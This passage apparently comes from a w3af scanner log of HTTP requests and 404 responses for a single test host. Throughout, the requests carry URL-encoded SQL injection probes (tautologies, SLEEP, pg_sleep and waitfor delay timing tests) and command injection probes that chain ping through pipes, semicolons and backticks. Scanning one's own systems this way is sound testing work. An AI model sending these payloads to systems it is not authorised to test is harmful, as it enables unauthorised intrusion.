                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="704">
                <http-request>
                    <status>GET http://10.12.68.43:31337/cdZTDLwR HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about cdZTDLwR has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='cdZTDLwR'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="712">
                <http-request>
                    <status>GET http://10.12.68.43:31337/2%22+OR+%222%22%3D%222 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 2%22+OR+%222%22%3D%222 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='2%22+OR+%222%22%3D%222'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="718">
                <http-request>
                    <status>GET http://10.12.68.43:31337/2%22+AND+%222%22%3D%223 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 2%22+AND+%222%22%3D%223 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='2%22+AND+%222%22%3D%223'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="721">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="726">
                <http-request>
                    <status>GET http://10.12.68.43:31337/7%27+OR+%277%27%3D%277 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 7%27+OR+%277%27%3D%277 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='7%27+OR+%277%27%3D%277'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="729">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="731">
                <http-request>
                    <status>GET http://10.12.68.43:31337/7%27+AND+%277%27%3D%278 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 7%27+AND+%277%27%3D%278 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='7%27+AND+%277%27%3D%278'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="739">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="743">
                <http-request>
                    <status>GET http://10.12.68.43:31337/74%27+OR+%2774%27%3D%2774 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 74%27+OR+%2774%27%3D%2774 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='74%27+OR+%2774%27%3D%2774'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="745">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="748">
                <http-request>
                    <status>GET http://10.12.68.43:31337/74%27+AND+%2774%27%3D%2775 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 74%27+AND+%2774%27%3D%2775 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='74%27+AND+%2774%27%3D%2775'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="755">
                <http-request>
                    <status>GET http://10.12.68.43:31337/7+OR+7%3D7+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 7+OR+7%3D7+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='7+OR+7%3D7+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="759">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="760">
                <http-request>
                    <status>GET http://10.12.68.43:31337/7+AND+7%3D8+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 7+AND+7%3D8+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='7+AND+7%3D8+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="765">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7C%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7C%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="768">
                <http-request>
                    <status>GET http://10.12.68.43:31337/14+OR+14%3D14+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 14+OR+14%3D14+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='14+OR+14%3D14+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="773">
                <http-request>
                    <status>GET http://10.12.68.43:31337/14+AND+14%3D15+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 14+AND+14%3D15+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='14+AND+14%3D15+'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="775">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="779">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Bping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="791">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1+or+SLEEP%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+SLEEP%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+SLEEP%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="797">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3Bping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3Bping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3Bping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="806">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27+or+SLEEP%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27+or+SLEEP%283%29+and+%271%27%3D%271 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27+or+SLEEP%283%29+and+%271%27%3D%271'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="812">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %3B%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%3B%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="821">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%22+or+SLEEP%283%29+and+%221%22%3D%221 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%22+or+SLEEP%283%29+and+%221%22%3D%221 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%22+or+SLEEP%283%29+and+%221%22%3D%221'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="828">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60ping+-n+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-n+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-n+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="837">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1+or+pg_sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1+or+pg_sleep%283%29 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1+or+pg_sleep%283%29'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="845">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%60ping+-c+4+localhost%60 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %60ping+-c+4+localhost%60 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%60ping+-c+4+localhost%60'&gt;reload the current page&lt;/a&gt;
</body>
                </http-response>
            </http-transaction>
            <http-transaction id="854">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%27+or+pg_sleep%283%29+and+%271%27%3D%271 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
